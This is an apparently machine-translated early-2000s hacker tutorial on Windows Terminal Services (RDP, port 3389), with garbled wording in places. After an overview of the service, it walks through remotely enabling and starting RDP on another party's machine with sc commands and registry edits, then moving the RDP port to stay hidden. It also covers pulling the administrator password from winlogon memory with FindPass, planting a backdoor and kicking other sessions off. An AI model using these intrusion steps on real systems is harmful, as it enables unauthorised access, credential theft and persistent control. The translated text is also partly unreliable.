In fact, it is not what original, many are from the Internet, just re-editing it, everyone is good.
First, introducing the WIN system NT version provides a special service - terminal service, cooked to 3389 service on the network, some readers will definitely say: Isn't it the 3389 input method? I know, this sentence is a big mistake, 3389 is not a input method, 3389 does not necessarily have input method vulnerabilities, it is a normal service of Windows, just without patching 3389 (terminal Service) port, you can use input method vulnerabilities to invade, but now this vulnerability is rare. But I really fully understand that the terminal service is less, here I will take everyone a comprehensive understanding, so that everyone is in network security Aspects sweep an obstacle.
Second, the concept of terminal service concept terminal service overview
Terminal Services provides the ability to remotely access server desktops remotely through "thin client" software that works as a terminal emulator. Terminal Services only pass the user interface of the program to the client. The client then returns the keyboard and the mouse click action to process it by the server. Each user can only log in and see their own sessions, which are transparently managed by the server operating system and have nothing to do with any other customer. Customer software can run on multiple client hardware devices, including computers and Windows-based terminals. Other devices such as Macintosh computers or UNIX-based workstations, you can also connect to the terminal server using other third-party software.
Terminal Services can be configured on the server in application server mode or remote management mode. As an application server, the terminal service provides an effective and reliable manner that distributes Windows-based programs via the web server. In the application server mode, the terminal service displays the Windows 2000 desktop that may not function Windows, and currently Windows-based applications. Terminal services provide remote access capabilities when used in remote management mode, allowing you to manage your server from anywhere on the network.
Terminal services have the following benefits:
Show the desktop of Windows 2000 faster. The terminal service has a bridge that migrates from the old desktop to Windows 2000 Professional, for non-computer desktops, and hardware upgrades that provide a virtual Windows 2000 desktop environment that is fully running Windows 2000 operating system locally. Terminal Services can be used in a variety of different desktop platforms, including MS-DOS, Windows-based terminal, Macintosh, and UNIX. (Additional software required to connect with MS-DOS, Macintosh and UNIX-based computers). Take advantage of existing hardware. The terminal service extends the distributed computing model that allows computers to operate simultaneously as a thin client and personal computer with complete features. When your computer is on an existing network, you can continue to use, and you can use thin clients that can simulate Windows 2000 Professional desktops. A centralized configuration of the program. Using a terminal service running on Windows 2000 Server, all programs execution, data processing, and data storage are made on the server, and the program is set. Terminal Services ensures that all clients can access the current version of the program. The software can only be installed once on the server, and cannot be installed on each desktop of your unit, which reduces the cost of individual updating computers. Remote management. Terminal services provide remote management of Windows 2000 Server, providing system administrators with a way to remotely manage their servers from any client through wide area network or dial-up connection.
Why hacks like terminal services: Mainly 3 features of terminal services: Easy to use manageability security These three features determine its position in the network, it is powerful than any trowel energy, because of it, You are equal to the machine that fully controls the other party, you can complete all intrusion tasks that this machine is completed. (As long as your network is fast enough), it is still not annoying statement.
Third, regarding the opening of the terminal service utilization tool to open 3389, I don't want to say more, this is not much technical, here I mainly introduce two methods that do not have any tool open 3389. 1. Use SC to open the other party terminal service
First, I first identify that the other party is 2000Server, you can use the small CCA to see the other party's users, if there is a TSINTERNETUSER user, 9 becomes Server,
C: //> CCA 192.168.0.29 Dudu Dancewithsnow
Check Clone Account, by Netxeyes 2002/04/29 Written By Netxeyes 2002, Dansnow@21cn.com
Connect 192.168.0.29 .... ok prepairing .... ok processing .... ok checking ....
Check Result:
[DUDU] As Same As [Administrator] [Guest] As Same As [Administrator] [IUSR_RONG] As Same As [Administrator] [IWAM_RONG] As Same As [Administrator] [TEST] AS Same As [Administrator] [XR] AS SAME As [administrator]
Obviously this is not a server, then look at the example:
C: //> NET USE XXX.XXX.XXX.XXX//IPC / "Password /" / user: / "name /"
The first step is to check if the other party really disables Terminal Server
C: //> sc xxx.xxx.xxx.xxx qc TerMservice [sc] GetServiceConfig success
SERVICE_NAME: termservice TYPE: 10 WIN32_OWN_PROCESS START_TYPE: 4 DISABLED ERROR_CONTROL: 1 NORMAL BINARY_PATH_NAME: C: //WINNT//System32//termsrv.exe LOAD_ORDER_GROUP: TAG: 0 DISPLAY_NAME: Terminal Services DEPENDENCIES: SERVICE_START_NAME: LocalSystem
Look at the start_type, showing the launch mode of the other party to "disabled" is "disabled".
Step 2, change the startup mode of the other party terminal service
C: //> sc xxx.xxx.xxx.xxx config termservice start = auto
[Sc] ChangeServiceConfig SUCCESS
Ok, now we have modified the startup mode of the other terminal service to automatic.
In the third step, check the startup mode of the other party terminal service.
C: //> SC Test QC Termservice [SC] GetServiceConfig Success
SERVICE_NAME: termservice TYPE: 10 WIN32_OWN_PROCESS START_TYPE: 2 AUTO_START ERROR_CONTROL: 1 NORMAL BINARY_PATH_NAME: C: //WINNT//System32//termsrv.exe LOAD_ORDER_GROUP: TAG: 0 DISPLAY_NAME: Terminal Services DEPENDENCIES: SERVICE_START_NAME: LocalSystem start_type a closer look, The startup mode of the other party is "Auto_Start" is "Auto".
OK fourth step, start the other party's terminal service
C: //> sc xxx.xxx.xxx.xxx Start Termservice
SERVICE_NAME: termservice TYPE: 10 WIN32_OWN_PROCESS STATE: 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE: 0 (0x0) SERVICE_EXIT_CODE: 0 (0x0) CHECKPOINT: 0x1 WAIT_HINT: 0x7530
C: //> sc xxx.xxx.xxx.xxx query termservice
SERVICE_NAME: termservice TYPE: 10 WIN32_OWN_PROCESS STATE: 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE: 0 (0x0) SERVICE_EXIT_CODE: 0 (0x0) CHECKPOINT: 0x0 WAIT_HINT: 0x0
Here, the other party's 3389 is started in the command line.
2. Use the remote modification registry to first open the registry, registry - connected to the network registry (provided first with the other party to create an empty connection) and change to the following value, [HKEY_LOCAL_MACHINE // Software // Microsoft // Windows // CurrentVersion // NetCache] / "enabled /" = / "0 /"
[HKEY_LOCAL_MACHINE // Software // Microsoft // Windows NT // CurrentVersion // Winlogon] / "ShutdownwithOutlogon /" = / "0 /"
[HKEY_LOCAL_MACHINE // Software // Policies // Microsoft // Windows // Installer] / "enableadmintsRemote /" = dword: 00000001
[HKEY_LOCAL_MACHINE // System // CurrentControlSet // Control // Terminal Server] / "tsenabled /" = dword: 00000001
[HKEY_LOCAL_MACHINE // System // CurrentControlset // Services // Termdd] / "start /" = dword: 00000002
[HKEY_LOCAL_MACHINE // System // CurrentControlSet // Services // Termservice] / "START /" = DWord: 00000002
[HKEY_USERS //. Default // Keyboard Layout // Toggle] / "Hotkey /" = / "1 /" Then enter: shutdown xxx.xxx.xxx.xxx -r The other party restarts, 3389 service is open.
Fourth, after entering, the first is to change the 3389 port, modify the port settings of the server side, the registry has 2 places to modify [HKEY_LOCAL_MACHINE // System // CurrentControlSet // Control // TerminalServer // WDS // RDPWD // TDS // TCP] portnumber value, the default is 3389, modified to the desired port, such as the second place in 6000: [HKEY_LOCAL_MACHINE // System // CurrentControlSet // Control // Terminal Server // WinStations // RDP -Tcp] portnumber value, the default is 3389, modify the desired port, such as 6000 now. The restart system is OK. Note: In fact, only the second place is also possible. In addition, the standard coupling of the second place should be [HKEY_LOCAL_MACHINE // System // CurrentControlSet // Control // Terminal Server // WinStations //
2, get a security account, what account is the safer? Of course, it is an administrator's account. Here you can use the FINDPASS and Nern NT / 2000 / XP password, because the latter I have repeatedly said, so this time I speel how to get the administrator account with FINDPASS, to Xiaofengju download After that, there will be two files: Findpass and Pulist These two files are obvious that these two files are used together. First run the PULIST, find the value of the PID behind Winlogon.exe, here is 204, record, find the domain where administrator is located, here for Shuangfeng // Administrator, then run the Findpass, the format is: FINDPASS Machine Name User Name Winlogon's PID We entered: Findpass Shuangfeng Administrator 204 Entering this line
The logon information is: shuanfeng / administrator / 5201314
5201314 is password
3, leave the door, the online back door can be used for everyone free choice, but remember one: guns and birds, the most popular back door is also the back door that is most likely to be killed, about how to hide the back door and stay in the back door, please please I will explain it specially in the next hacker online.
Appendix: 1 Time Logon Time> W1 Console 0 runs. 2002-1-19 2:37 W1 1 has been disconnected 2002-1-19 3: 14 // What you see may be more than two RDP connections, here is just Give everyone a demonstration. Seek? The user of ID 0 is local landing, ID 1 is 3389 login, it has been disconnected, kick it,
C: //> Logoff 1
C: //> query user // Take a look at the username sessionname ID State Idle Time Logon Time> W1 Console 0 running. 2002-1-19 2:37
// Nothing! You can go!
Shortcuts in 2,3389: Ctrl Alt End opens the Windows Security dialog. Alt Page Up switches between the procedures from left to the right. Alt Page Down Switches between the right orientation. Alt INSERT switches back to the program in the boot order. Alt Home Displays the "Start" menu. Ctrl Alt Break switches the client between the window (if applicable) and full screen display. Alt Delete Displays the pop-up menu of the window. Ctrl Alt Minute (-) Place the snapshot of the client activity window on the clipboard of the Terminal server (the same as the function when pressing the Alt Printscrn button on the local computer). Ctrl Alt plus ( ) places the snapshot of the entire client window area on the clipboard of the Terminal server (the same as the function when PRINTSCRN keys on the local computer). Note: In the NEC98 computer, these shortcuts are somewhat different in both cases: Ctrl Alt Break is replaced by the F12 key. Ctrl Alt End is replaced by the F15 key.
(Finish)
